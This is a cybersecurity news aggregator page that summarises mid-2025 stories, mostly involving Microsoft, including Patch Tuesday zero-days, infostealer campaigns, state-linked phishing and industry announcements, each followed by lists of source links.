CyberSecurity news

FlagThis - #Microsoft

Mona Thaker@Microsoft Security Blog //
Microsoft and Wiz have both been recognized as Leaders in the 2025 IDC MarketScape for Cloud-Native Application Protection Platforms (CNAPP). This recognition underscores the growing importance of CNAPP solutions as organizations grapple with securing increasingly complex cloud environments. The IDC MarketScape assesses vendors based on their capabilities and strategic vision, providing guidance for security leaders seeking to replace fragmented point tools with a unified approach to cloud security. Both Microsoft and Wiz have demonstrated a strong commitment to innovation and customer success in cloud security.

The IDC MarketScape emphasizes that selecting a CNAPP vendor involves more than just consolidating tools. It highlights the importance of seamless integration with existing security infrastructure and the ability to enhance the overall security posture. Key considerations include robust monitoring and reporting on cloud security posture, runtime, and application security. Microsoft's recognition stems from its comprehensive, AI-powered, and integrated security solutions for multicloud environments. Wiz is also committed to customer success across cloud security.

Microsoft's Defender for Cloud was specifically lauded for providing visibility into cloud attacks across the entire environment, from endpoints to exposed identities. The platform's holistic approach examines attack vectors both inside and outside the cloud, integrating pre-breach posture graphs with live incidents for exposure risk assessment. Additionally, Microsoft was recognized for its detailed threat analytics, which combines information from various sources to create comprehensive attack paths and facilitate threat prioritization. Customers also highlighted the strong partnership with Microsoft, noting dedicated support and consulting for optimal product use.

Recommended read:
References :
  • Microsoft Security Blog: Microsoft Named a Leader in the 2025 IDC CNAPP MarketScape: Key Takeaways for Security Buyers
  • Wiz Blog | RSS feed: Wiz Recognized as a Leader in the 2025 IDC MarketScape for CNAPP
  • AI News: The cloud-native application protection platform (CNAPP) market continues to evolve rapidly as organizations look to secure increasingly complex cloud environments. In the recently published 2025 IDC MarketScape for Worldwide CNAPP, Microsoft has been recognized as a Leader, reaffirming its commitment to delivering comprehensive, AI-powered, and integrated security solutions for multicloud environments.

@www.helpnetsecurity.com //
Russian hackers have found a way to bypass Gmail's multi-factor authentication (MFA) to conduct targeted attacks against academics and critics engaging with Russia discussions. According to Google Threat Intelligence Group (GTIG), the hackers are using stolen app passwords obtained through sophisticated and personalized social engineering attacks. These attacks involve posing as U.S. Department of State officials to build rapport with targets, eventually convincing them to create and share app-specific passwords.

App passwords are 16-digit codes that Google generates to allow certain apps or devices to access a Google Account, bypassing the usual second verification step of MFA. While useful for older or less secure apps that can't handle MFA, app passwords lack the extra layer of security, making them vulnerable to theft or phishing. In one instance, the attackers, tracked as UNC6293 and believed to be state-sponsored, contacted a target under the guise of a State Department representative, inviting them to a consultation in a private online conversation, further lending credibility by CCing four @state.gov accounts.

This campaign, which took place between April and early June, involved meticulously crafted phishing messages that didn't rush the target into immediate action. Instead, the hackers focused on building trust through personalized emails and invitations to private conversations, using spoofed '@state.gov' addresses in the CC field to build credibility. Keir Giles, a prominent British researcher on Russia, was one such target. Google's researchers uncovered the slow-paced nature attackers used to build rapports with their victims, often sending them personalized emails and inviting them to private conversations or meetings.

Recommended read:
References :
  • www.bleepingcomputer.com: Russian hackers bypass Gmail MFA using stolen app passwords
  • Malwarebytes: Gmail’s multi-factor authentication bypassed by hackers to pull off targeted attacks
  • Help Net Security: Microsoft will start removing legacy drivers from Windows Update to improve driver quality for Windows users but, most importantly, to increase security, the company has announced.
  • www.techradar.com: Academics and critics engaging with Russia discussions are being targeted in email phishing campaign.

Rescana@Rescana //
References: infosec.exchange , WIRED ,
Amidst escalating regional conflicts, Iran has taken the drastic measure of shutting down internet access for its citizens, a move the government defends as a necessary precaution against Israeli cyberattacks. This disruption has severely impacted communication within the country, leaving Iranians abroad unable to connect with loved ones. One such individual, Amir Rashidi, expressed his anxiety, stating he hadn't heard from his family in two days and was relying on someone else for updates. The situation highlights the growing intersection of cyber warfare and real-world consequences for civilians.

The internet blackout is not the first instance of Iran limiting connectivity. In the past, similar restrictions were imposed during periods of political unrest, such as protests in 2019 and 2022. These shutdowns are implemented by pushing people towards domestic apps, which are often less secure, while also severely restricting access to vital information. Experts like Doug Madory from Kentik have documented significant drops in internet connectivity within Iran following recent Israeli airstrikes, with reductions of 54% initially, followed by further declines of 49% and, subsequently, a staggering 90%.

In a defensive maneuver against cyber threats, Iran is throttling its National Internet Infrastructure. The country claims it is restricting internet connectivity to counter cyber attacks amid regional conflict. The stated aim is to impede cyber intrusions and the synchronization of adversarial operations. An example of the threats Iran faces is demonstrated by the Israeli-linked hackers who seized and burned $90 million from Iran's Nobitex exchange.

Recommended read:
References :
  • infosec.exchange: NEW: Iran's government has now admitted that it took down the internet in the country, arguing that it did to protect against Israeli cyberattacks. I spoke to two Iranians who live abroad and can't communicate with their loved ones back home because of the blackout.
  • WIRED: Iran is limiting internet connectivity for citizens amid Israeli airstrikes—pushing people towards domestic apps, which may not be secure, and limiting their ability to access vital information. —
  • Rescana: Iran National Internet Infrastructure Throttling: Cyber Defense Strategy to Prevent Attacks Amid Regional Conflict

@blog.redteam-pentesting.de //
A new Kerberos relay attack, identified as CVE-2025-33073, has been discovered that bypasses NTLM protections and allows attackers to escalate privileges to NT AUTHORITY\SYSTEM. This reflective Kerberos relay attack involves coercing a host to authenticate, intercepting the Kerberos ticket, and relaying it back to the same host, effectively exploiting misconfigurations and the lack of enforced SMB signing. RedTeam Pentesting discovered the vulnerability in January 2025 and disclosed it to Microsoft in an extensive whitepaper.

Microsoft addressed this vulnerability as part of the June 2025 Patch Tuesday. Technical analyses of CVE-2025-33073 have been published by RedTeam Pentesting and Synacktiv. The vulnerability is rooted in how the SMB client negotiates Kerberos authentication. When the SMB client has negotiated Kerberos instead of NTLM, a session key is inserted into a global list, KerbSKeyList, without proper checks, allowing attackers to reuse a subkey under specific conditions to forge a privileged token.

The attack begins with authentication coercion via SMB, tricking a victim machine into connecting to a malicious SMB server. The server forces the client into Kerberos authentication, generates a subkey, logs it into KerbSKeyList with privileged token data, and forges a valid AP-REQ ticket using the subkey. The SMB client accepts and validates the forged ticket, leading to the generation of a SYSTEM token and granting administrative privileges. A proof-of-concept exploit has been made available to demonstrate the vulnerability's potential.

Recommended read:
References :
  • bsky.app: RedTeam Pentesting and Synacktiv have published technical analyses of CVE-2025-33073, a new way to execute NTLM reflection attacks. This was fixed in this month's Patch Tuesday and also works against Kerberos.
  • Catalin Cimpanu: RedTeam Pentesting and Synacktiv have published technical analyses of CVE-2025-33073, a new way to execute NTLM reflection attacks. This was fixed in this month's Patch Tuesday and also works against Kerberos.
  • securityonline.info: Windows SMB Flaw (CVE-2025-33073): SYSTEM Privilege Escalation via Kerberos, PoC Available
  • blog.redteam-pentesting.de: Reflective Kerberos Relay Attack
  • www.synacktiv.com: NTLM reflection is dead, long live NTLM reflection: An in-depth analysis of CVE-2025
  • Daily CyberSecurity: Windows SMB Flaw (CVE-2025-33073): SYSTEM Privilege Escalation via Kerberos, PoC Available
  • infosecwriteups.com: Reflective Kerberos Relay Attack (CVE-2025-33073): NT AUTHORITY\SYSTEM Privilege Escalation

Michael Kan@PCMag Middle East ai //
A new cyber threat has emerged, targeting users eager to experiment with the DeepSeek AI model. Cybercriminals are exploiting the popularity of open-source AI by disguising malware as a legitimate installer for DeepSeek-R1. Unsuspecting victims are unknowingly downloading "BrowserVenom" malware, a malicious program designed to steal stored credentials, session cookies, and gain access to cryptocurrency wallets. This sophisticated attack highlights the growing trend of cybercriminals leveraging interest in AI to distribute malware.

This attack vector involves malicious Google ads that redirect users to a fake DeepSeek domain when they search for "deepseek r1." The fraudulent website, designed to mimic the official DeepSeek page, prompts users to download a file named "AI_Launcher_1.21.exe." Once executed, the installer displays a fake installation screen while silently installing BrowserVenom in the background. Security experts at Kaspersky have traced the threat and identified that the malware reconfigures browsers to route traffic through a proxy server controlled by the hackers, enabling them to intercept sensitive data.

Kaspersky's investigation revealed that the BrowserVenom malware can evade many antivirus programs and has already infected computers in various countries, including Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The analysis of the phishing and distribution websites revealed Russian-language comments within the source code, suggesting the involvement of Russian-speaking threat actors. This incident serves as a reminder to verify the legitimacy of websites and software before downloading, especially when dealing with open-source AI tools that require multiple installation steps.

Recommended read:
References :
  • gbhackers.com: Threat Actors Exploit DeepSeek-R1 Popularity to Target Windows Device Users
  • PCMag Middle East ai: 'BrowserVenom' Windows Malware Preys on Users Looking to Run DeepSeek AI
  • bsky.app: Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legit installer for DeepSeek Victims are unwittingly downloading the "BrowserVenom" malware designed to steal stored credentials, session cookies, etc and gain access to cryptocurrency wallets
  • The Register - Software: DeepSeek installer or just malware in disguise? Click around and find out
  • Malware ? Graham Cluley: Malware attack disguises itself as DeepSeek installer
  • Graham Cluley: Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legitimate installer for DeepSeek.
  • Securelist: Toxic trend: Another malware threat targets DeepSeek
  • www.pcmag.com: Antivirus provider Kaspersky traces the threat to malicious Google ads.
  • www.techradar.com: Fake DeepSeek website found serving dangerous malware instead of the popular app.
  • www.microsoft.com: Rewriting SymCrypt in Rust to modernize Microsoft’s cryptographic library
  • ASEC: Warning Against Distribution of Malware Disguised as Research Papers (Kimsuky Group)
  • cyble.com: Over 20 Crypto Phishing Applications Found on the Play Store Stealing Mnemonic Phrases

info@thehackernews.com (The@The Hacker News //
A new account takeover (ATO) campaign, dubbed UNK_SneakyStrike, is actively targeting Microsoft Entra ID user accounts. Cybersecurity researchers at Proofpoint have identified that the campaign is leveraging the TeamFiltration pentesting framework to breach accounts. The activity has been ongoing since December 2024, with a surge in login attempts impacting over 80,000 user accounts across hundreds of organizations' cloud tenants. This poses a significant threat to cloud security, as successful account takeovers can lead to data exfiltration and further malicious activities.

The attackers are leveraging the TeamFiltration framework to identify valid user accounts and use password-spraying techniques to gain access. They have been observed utilizing Microsoft Teams API and Amazon Web Services (AWS) servers from various geographic locations to carry out user enumeration and password-spraying attacks. Once an account is compromised, the attackers are able to access sensitive data and potentially upload malicious files to the target user's OneDrive. This campaign demonstrates how legitimate pentesting tools can be exploited for malicious purposes, highlighting the need for robust security measures.

Organizations are advised to monitor for indicators of compromise related to the UNK_SneakyStrike campaign. According to researchers, unauthorized access attempts tend to occur in concentrated bursts targeting a wide range of users within a single cloud environment. This is followed by quiet periods. The attackers appear to be attempting to access all user accounts within smaller cloud tenants while focusing on a subset of users in larger ones. Defenders are urged to check if any of their organization's accounts have been compromised and implement stronger authentication measures to prevent future account takeovers.

Recommended read:
References :
  • Virus Bulletin: Proofpoint threat researchers have recently uncovered an active account takeover (ATO) campaign, tracked as UNK_SneakyStrike, using the TeamFiltration pentesting framework to target Entra ID user accounts.
  • The Hacker News: Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool
  • Help Net Security: Researchers warn of ongoing Entra ID account takeover campaign
  • ciso2ciso.com: Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool – Source:thehackernews.com
  • www.helpnetsecurity.com: Researchers warn of ongoing Entra ID account takeover campaign
  • Proofpoint Threat Insight: Attackers Unleash TeamFiltration Account Takeover Campaign
  • BleepingComputer: Password-spraying attacks target 80,000 Microsoft Entra ID accounts
  • Techzine Global: Cybercriminals are using the TeamFiltration pentesting tool in a large-scale campaign targeting Office 365 accounts. The attacks, attributed to UNK_SneakyStrike, have so far targeted more than 80,000 user accounts.
  • www.scworld.com: TeamFiltration pentesting tool harnessed in global Microsoft Entra ID attack campaign
  • bsky.app: Reported UNK_SneakyStrike campaigns have leveraged TeamFiltration which can steal the victim’s Cookies, Password, History, Bookmarks and AutoFill data.
  • sra.io: UNK_SneakyStrike weaponizes TeamFiltration tool targeting 80K+ Entra ID accounts via AWS infrastructure. #AccountTakeover #Microsoft365 #AWS The post appeared first on .
  • Security Risk Advisors: UNK_SneakyStrike Campaign Weaponizes TeamFiltration Tool to Target 80,000 Entra ID Accounts

@research.checkpoint.com //
Microsoft's June 2025 Patch Tuesday has addressed a total of 66 vulnerabilities across its product range, with one zero-day vulnerability, CVE-2025-33053, being actively exploited in the wild. This critical flaw exists in the Web Distributed Authoring and Versioning (WebDAV) implementation, and its exploitation could lead to remote code execution. Microsoft has issued an urgent security update to mitigate this threat, even for outdated systems like Windows Server 2008 and components of the long-retired Internet Explorer. The urgency of this patch is underscored by the ongoing exploitation of the vulnerability by the Stealth Falcon APT group.

The actively exploited zero-day, CVE-2025-33053, poses a significant risk because attackers can achieve remote code execution at the local level simply by tricking a user into following a malicious link. This vulnerability has been exploited since March 2025 by Stealth Falcon, a hacking group known for targeted attacks in the Middle East. Researchers at Check Point discovered the flaw being used against a Turkish defense company, where malware was inserted to facilitate data exfiltration and the installation of a custom keylogger. The attack involves a .url file disguised as a PDF, which, when clicked, redirects to a WebDAV server controlled by the attacker, causing a legitimate Windows diagnostic tool to execute a malicious file.

Alongside the actively exploited zero-day, Microsoft's June 2025 Patch Tuesday addresses a range of other vulnerabilities, including ten that are rated as "Critical". Another notable flaw, CVE-2025-33073, affects the Windows Server Message Block (SMB) client and could allow attackers to gain SYSTEM privileges. This vulnerability is considered less likely to be exploited but can be mitigated by enforcing server-side SMB signing via Group Policy. The updates also include fixes for vulnerabilities in Microsoft Office, .NET, Visual Studio, and other products, highlighting the breadth of the security update.

Recommended read:
References :
  • isc.sans.edu: Microsoft today released patches for 67 vulnerabilities. 10 of these vulnerabilities are rated critical. One vulnerability has already been exploited and another vulnerability has been publicly disclosed before today.
  • BleepingComputer: Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws
  • Tenable Blog: Microsoft’s June 2025 Patch Tuesday Addresses 65 CVEs (CVE-2025-33053)
  • cyberinsider.com: Microsoft's June 2025 Patch Tuesday addresses 66 vulnerabilities across its product suite, including a high-severity zero-day in the WebDAV service that is currently being exploited in the wild.
  • securityonline.info: Stealth Falcon Exploits New Zero-Day (CVE-2025-33053) in Sophisticated Cyberespionage Campaign
  • Cisco Talos Blog: Microsoft Patch Tuesday for June 2025 — Snort rules and prominent vulnerabilities
  • borncity.com: Summarizes the Microsoft security updates for June 10, 2025, noting the zero-day classification.
  • Threats | CyberScoop: Microsoft Patch Tuesday addresses 66 vulnerabilities, including an actively exploited zero-day
  • hackread.com: June 2025 Patch Tuesday: Microsoft Fixes 66 Bugs, Including Active 0-Day
  • CyberInsider: Summary of the June 2025 Patch Tuesday release.
  • research.checkpoint.com: Check Point Research discovered a new campaign conducted by the APT group Stealth Falcon. The attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server.
  • gbhackers.com: Microsoft Patch Tuesday June 2025 – 66 Vulnerabilities Patched Including 2 Zero-Day
  • cyberscoop.com: Reports on Microsoft patching 66 vulnerabilities, including an actively exploited zero-day.
  • bsky.app: This month, Microsoft patched 67 vulnerabilities, including one actively exploited zero-days—CVE-2025-33053, a WebDAV RCE discovered by Check Point
  • gbhackers.com: Microsoft Windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild
  • www.helpnetsecurity.com: Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053)
  • Kaspersky official blog: CVE-2025-33053: RCE in WebDAV | Kaspersky official blog
  • thehackernews.com: Microsoft Patches 67 Vulnerabilities Including WEBDAV Zero-Day Exploited in the Wild
  • blog.checkpoint.com: Inside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day
  • Check Point Blog: Inside Stealth Falcon's Espionage Campaign Using a Microsoft Zero-Day
  • securityonline.info: Stealth Falcon Exploits New Zero-Day (CVE-2025-33053) in Sophisticated Cyberespionage Campaign
  • Blog: Microsoft’s June addressed 66 vulnerabilities. Notably, one of them has been actively exploited, and one other has been publicly disclosed.
  • go.theregister.com: Microsoft warns of 66 flaws to fix for this Patch Tuesday, and two are under active attack
  • arcticwolf.com: Arctic Wolf's blog covering the June 2025 Microsoft Patch Tuesday, mentioning CVE-2025-33053.
  • socprime.com: A new critical zero-day RCE vulnerability in Microsoft Windows, tracked as CVE-2025-33053, has been actively exploited by the Stealth Falcon (aka FruityArmor) APT group. The flaw leads to RCE by manipulating the system’s working directory.
  • www.bleepingcomputer.com: An APT hacking group known as 'Stealth Falcon' exploited a Windows WebDav RCE vulnerability in zero-day attacks since March 2025 against defense and government organizations in Turkey, Qatar, Egypt, and Yemen.
  • arcticwolf.com: Arctic Wolf observes that Microsoft Patch Tuesday: June 2025 includes CVE-2025-33053.
  • Virus Bulletin: Check Point Research discovered a new campaign conducted by the APT group Stealth Falcon. The attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server.
  • borncity.com: Microsoft Security Update Summary (June 10, 2025)
  • www.threatdown.com: June 2025 Microsoft Patch Tuesday fixes two zero-days
  • Arctic Wolf: Microsoft Patch Tuesday: June 2025
  • Help Net Security: Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053)
  • thecyberexpress.com: Microsoft Patch Tuesday June 2025: One Zero-Day, Nine High-risk Flaws Fixed
  • infosecwriteups.com: (CVE-2025-33053) New 0-Day in WebDAV Exposes Servers to Remote Code Execution  —  Here’s What You…
  • Action1: June 2025 Vulnerability Digest Recording
  • 0patch Blog: Micropatches Released for WEBDAV Remote Code Execution Vulnerability (CVE-2025-33053)
  • Check Point Research: CVE-2025-33053, Stealth Falcon and Horus: A Saga of Middle Eastern Cyber Espionage

@blogs.microsoft.com //
Microsoft has launched the European Security Program (ESP), a new initiative aimed at significantly strengthening cybersecurity across Europe. The program provides critical resources to governments within the European Union, the United Kingdom, EU accession countries, and members of the European Free Trade Association. Microsoft Vice Chair Brad Smith unveiled the ESP in Berlin, emphasizing the need for enhanced cyber protection amidst growing sophistication and scope of cyber threats.

The ESP is a three-pronged strategy that includes AI-enhanced threat intelligence, direct collaboration with Europol, and automated disruption of malicious infrastructure. This program aims to counter the rising tide of cyberattacks from nation-state actors, specifically those originating from Russia, China, Iran, and North Korea. Microsoft is offering these AI-powered defense tools and threat intelligence resources free of charge, to the 27 EU nations.

By offering these resources, Microsoft intends to bolster digital sovereignty and address the operational complexities faced by European governments in defending against cyber threats. The initiative underscores Microsoft's commitment to sharing threat intelligence, strengthening cybersecurity capacity, and expanding partnerships to effectively disrupt malicious cyber activities. The free cyber security support will help European governments combat state-sponsored hackers as attacks continue to intensify across the continent.

Recommended read:
References :

Alex Simons@Microsoft Security Blog //
Microsoft is grappling with ongoing issues related to its Windows Updates, with another out-of-band patch released to address problems caused by a previous update. The May Patch Tuesday update had failed to install correctly on some Windows 11 virtual machines, leaving them in recovery mode with an "ACPI.sys" error. KB5062170 aims to resolve this boot error which affected Windows 11 23H2 and 22H2 systems, with the caveat that it does not fix a separate issue causing blurry CJK fonts in Chromium browsers at 100 percent scaling, requiring users to increase scaling to 125 or 150 percent as a workaround. The increasing frequency of these out-of-band fixes highlights ongoing challenges with Microsoft's quality control, impacting both consumer and enterprise users.

Alongside addressing update failures, Microsoft is actively developing AI capabilities and integrating them into its services. While specific details are limited, Microsoft is working towards building a "robust and sophisticated set of agents" across various fields and is looking at evolving identity standards. This future vision involves AI agents that can proactively identify problems, suggest solutions, and maintain context across conversations, going beyond simple request-response interactions. The company recently launched a public preview of its Conditional Access Optimizer Agent and is investing in agents for developer and operations workflows.

In the realm of cybersecurity, Microsoft Threat Intelligence has identified a new Russia-affiliated threat actor named Void Blizzard, active since at least April 2024. Void Blizzard is engaging in worldwide cloud abuse activity and cyberespionage, targeting organizations of interest to Russia in critical sectors such as government, defense, transportation, media, NGOs, and healthcare, primarily in Europe and North America. This discovery underscores the ongoing need for vigilance and proactive threat detection in the face of evolving cyber threats.

Recommended read:
References :
  • Microsoft Security Blog: Our industry needs to continue working together on identity standards for agent access across systems. Read about how Microsoft is building a robust and sophisticated set of agents.
  • Davey Winder: Microsoft has confirmed that Windows Update is changing — here's what you need to know.
  • www.microsoft.com: Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024.

Brian Fagioli@BetaNews //
References: bsky.app , BetaNews , BleepingComputer ...
Microsoft is significantly expanding its cybersecurity support for European governments, providing a free security program specifically designed to combat AI-based cyberattacks. This initiative reflects Microsoft's commitment to bolstering the digital defenses of European nations. Furthermore, the company is actively addressing concerns related to competition within the European market, demonstrating a willingness to adapt to regulatory requirements and user preferences.

Microsoft is collaborating with CrowdStrike to harmonize cyber threat attribution. This partnership aims to establish a unified system for identifying and tracking cyber threat actors across different security platforms, which is designed to accelerate response times and strengthen global cyber defenses. The collaborative effort seeks to bridge the gaps created by differing naming systems for threat actors, creating a "Rosetta Stone" for cyber threat intelligence. This mapping will allow security teams to make informed decisions more quickly, correlate threat intelligence across sources, and disrupt malicious activity before it inflicts damage.

In response to Europe’s Digital Markets Act (DMA), Microsoft is making changes to the user experience within the European Economic Area. The company will reduce the frequency with which it prompts users to switch to Edge as their default browser. This change is intended to address complaints from rival browser makers and others who felt that Microsoft was unfairly pushing its own products. Europeans will also find it easier to uninstall the Windows Store and sideline Bing, offering greater control over their digital environment and aligning with the principles of the DMA, which aims to promote competition and user choice in the digital market.

Recommended read:
References :
  • bsky.app: While they will not switch to a single threat actor taxonomy, Microsoft and CrowdStrike analysts have already linked more than 80 overlapping threat groups.
  • BetaNews: In cybersecurity, every second counts. But when the same hacking group goes by half a dozen different names depending on which company you ask, defenders are left wasting time instead of stopping attacks.
  • @VMblog: CrowdStrike and Microsoft announced a collaboration to bring clarity and coordination to how cyber threat actors are identified and tracked across...
  • BleepingComputer: Microsoft and CrowdStrike announced today that they've partnered to connect the aliases used for specific threat groups without actually using a single naming standard.
  • SecureWorld News: CrowdStrike and Microsoft Join Forces on Naming Threat Actors
  • www.cybersecuritydive.com: Microsoft, CrowdStrike, other cyber firms collaborate on threat actor taxonomy
  • Source: Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies to help security professionals connect insights faster. The post appeared first on .
  • MSSP feed for Latest: Microsoft and CrowdStrike Align on Threat Actor Mapping to Support Faster, Unified Defense
  • Catalin Cimpanu: Microsoft and CrowdStrike are teaming up to create alignment across our individual threat actor taxonomies
  • betanews.com: In cybersecurity, every second counts. But when the same hacking group goes by half a dozen different names depending on which company you ask, defenders are left wasting time instead of stopping attacks. Now, Microsoft and CrowdStrike are teaming up to clean up the mess they helped create. The two companies just announced a joint effort to map their threat actor naming systems to each other.
  • www.crowdstrike.com: Cybersecurity writers, rejoice! The alliance will help the industry better correlate threat actor aliases without imposing a single naming standard. It will grow in the future to include other organizations that also practice the art of attribution.
  • www.microsoft.com: Announcing a new strategic collaboration to bring clarity to threat actor naming
  • www.scworld.com: Microsoft, CrowdStrike pitch giving threat groups the same name
  • www.cxoinsightme.com: CrowdStrike and Microsoft collaborate to harmonise cyber threat attribution
  • CIO Dive - Latest News: Microsoft, CrowdStrike, other cyber firms collaborate on threat actor taxonomy
  • The Hacker News: Microsoft and CrowdStrike are teaming up to align their individual threat actor taxonomies by publishing a new joint threat actor mapping.
  • www.csoonline.com: The partnership creates a shared mapping system that aligns threat actor attribution across both companies’ intelligence ecosystems.
  • aboutdfir.com: Microsoft and CrowdStrike finally fix the stupidest problem in cybersecurityÂ
  • cyberscoop.com: CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution
  • www.itpro.com: Confused at all the threat group names? You’re not alone. CrowdStrike and Microsoft want to change that
  • aboutdfir.com: Microsoft and CrowdStrike finally fix the stupidest problem in cybersecurity
  • Threats | CyberScoop: Wild variances in naming taxonomies aren’t going away, but a new initiative from the security vendors aims to more publicly address obvious overlap in threat group attribution.
  • www.techradar.com: Microsoft is looking to save precious seconds during cyberattacks by unifying threat actor naming.
  • ComputerWeekly.com: Microsoft outlines three-pronged European cyber strategy
  • CXO Insight Middle East: CrowdStrike and Microsoft collaborate to harmonise cyber threat attribution
  • www.microsoft.com: Meet the Deputy CISOs who help shape Microsoft’s approach to cybersecurity: Part 3
  • Thomas Roccia :verified:: Microsoft and CrowdStrike announced a collaboration to cross-ref their threat actor naming conventions.
  • TechHQ: Microsoft rolls out free cybersecurity support for European governments.

@blog.checkpoint.com //
Microsoft has revealed that Lumma Stealer malware has infected over 394,000 Windows computers across the globe. This data-stealing malware has been actively employed by financially motivated threat actors targeting various industries. Microsoft Threat Intelligence has been tracking the growth and increasing sophistication of Lumma Stealer for over a year, highlighting its persistent threat in the cyber landscape. The malware is designed to harvest sensitive information from infected systems, posing a significant risk to users and organizations alike.

Microsoft, in collaboration with industry partners and international law enforcement, has taken action to disrupt the infrastructure supporting Lumma Stealer. However, the developers behind the malware are reportedly making significant efforts to restore servers and bring the operation back online, indicating the tenacity of the threat. Despite these efforts, security researchers note that the Lumma Stealer operation has suffered reputational damage, potentially making it harder to regain trust among cybercriminals.

In related news, a new Rust-based information stealer called EDDIESTEALER is actively spreading through fake CAPTCHA campaigns, using the ClickFix social engineering tactic to trick users into running malicious PowerShell scripts. EDDIESTEALER targets crypto wallets, browser data, and credentials, demonstrating a continued trend of malware developers utilizing Rust for its enhanced stealth and stability. These developments underscore the importance of vigilance and robust cybersecurity practices to protect against evolving malware threats.

Recommended read:
References :
  • www.microsoft.com: Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer
  • Catalin Cimpanu: Mastodon: The developers of the Lumma Stealer malware are making significant efforts to restore servers and return online.

@securityonline.info //
Elastic Security Labs has identified a new information stealer called EDDIESTEALER, a Rust-based malware distributed through fake CAPTCHA campaigns. These campaigns trick users into executing malicious PowerShell scripts, which then deploy the infostealer onto their systems. EDDIESTEALER is hosted on multiple adversary-controlled web properties and employs the ClickFix social engineering tactic, luring unsuspecting individuals with the promise of CAPTCHA verification. The malware aims to harvest sensitive data, including credentials, browser information, and cryptocurrency wallet details.

This attack chain begins with threat actors compromising legitimate websites, injecting malicious JavaScript payloads that present bogus CAPTCHA check pages. Users are instructed to copy and paste a PowerShell command into their Windows terminal as verification, which retrieves and executes a JavaScript file called gverify.js. This script, in turn, fetches the EDDIESTEALER binary from a remote server, saving it in the downloads folder with a pseudorandom filename. The malware dynamically retrieves configuration data from a command-and-control server, allowing it to adapt its behavior and target specific programs.

EDDIESTEALER is designed to gather system metadata and siphon data of interest from infected hosts, including cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps like Telegram. The malware incorporates string encryption, a custom WinAPI lookup mechanism, and a mutex to prevent multiple instances from running. It also includes anti-sandbox checks and a self-deletion technique using NTFS Alternate Data Streams to evade detection. The dynamic C2 tasking gives attackers flexibility, highlighting the ongoing threat of ClickFix campaigns and the increasing use of Rust in malware development.

Recommended read:
References :
  • Virus Bulletin: Elastic Security Labs has uncovered a novel Rust-based infostealer distributed via Fake CAPTCHA campaigns that trick users into executing a malicious PowerShell script. EDDIESTEALER is hosted on multiple adversary-controlled web properties.
  • The Hacker News: New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
  • www.scworld.com: ClickFix used to spread novel Rust-based infostealer
  • Anonymous ???????? :af:: “Prove you're not a robot†— turns into full system breach! Hackers are using fake CAPTCHA checks to deploy a stealthy new Rust malware, EDDIESTEALER, via ClickFix—a social engineering trick abusing PowerShell on Windows , ,
  • securityonline.info: EDDIESTEALER: New Rust Infostealer Uses Fake CAPTCHAs to Hijack Crypto Wallets & Data
  • malware.news: Cybersecurity researchers have identified a sophisticated malware campaign utilizing deceptive CAPTCHA interfaces to distribute EddieStealer, a Rust-based information stealing malware that targets sensitive user data across multiple platforms.
  • cyberpress.org: ClickFix Technique Used by Threat Actors to Spread EddieStealer Malware
  • gbhackers.com: Threat Actors Leverage ClickFix Technique to Deploy EddieStealer Malware

info@thehackernews.com (The@The Hacker News //
A new Windows Remote Access Trojan (RAT) has been discovered that employs a novel technique to evade detection. The malware corrupts its own DOS and PE headers, making it significantly more difficult for security tools to analyze and reconstruct the malicious code. This method obstructs forensic analysis and allows the RAT to operate stealthily on compromised Windows machines for extended periods, in some cases, for weeks before being detected. The FortiGuard Incident Response Team conducted a detailed investigation into this malware.

The Fortinet team managed to obtain a memory dump of the live malware process (dllhost.exe process PID 8200) and a complete 33GB memory dump of the compromised system. By meticulously replicating the compromised environment, they were able to revive the dumped malware in a controlled setting. This allowed them to observe its operations and communication patterns. The researchers had to manually identify the malware's entry point, allocate memory, and resolve API addresses through debugging, address relocation, and parameter adjustments to emulate the malware's behaviour in a lab setting.

Once operational, the malware was found to communicate with a command-and-control (C2) server at rushpaperscom over port 443, utilizing TLS encryption. Fortinet analysts identified the malware's use of Windows API functions like SealMessage() and DecryptMessage() to handle encrypted traffic, along with an additional layer of custom encryption. Analysis confirms that the malware is a RAT, allowing attackers to capture screenshots, manipulate system services, and establish connections with other clients.

Recommended read:
References :
  • ciso2ciso.com: New Malware Spotted Corrupts Its Own Headers to Block Analysis – Source:hackread.com
  • hackread.com: New Windows Malware Spotted Corrupts Its Own Headers to Block Analysis
  • The Hacker News: New Windows RAT Evades Detection for Weeks Using Corrupted DOS and PE Headers
  • ciso2ciso.com: The FortiGuard Incident Response Team has released a detailed investigation into a newly discovered malware that managed to quietly operate on a compromised Windows machine for several weeks.

@www.microsoft.com //
References: www.microsoft.com
Microsoft is aggressively integrating artificial intelligence across its products and services, striving to revolutionize the user experience. The company is focused on developing agentic systems that can work independently, proactively identify problems, suggest solutions, and maintain context across interactions. Microsoft envisions a future where AI agents will augment and amplify organizational capabilities, leading to significant transformations in various fields. To facilitate secure and flexible interactions, Microsoft is employing Model Context Protocol (MCP) to enable AI models to interact with external services.

As AI agents become more sophisticated and integrated into business processes, Microsoft recognizes the importance of evolving identity standards. The company is actively working on robust mechanisms to ensure agents can securely access data and act across connected systems, including APIs, code repositories, and enterprise systems. Microsoft emphasizes that industry collaboration on identity standards is crucial for the safe and effective deployment of AI agents.

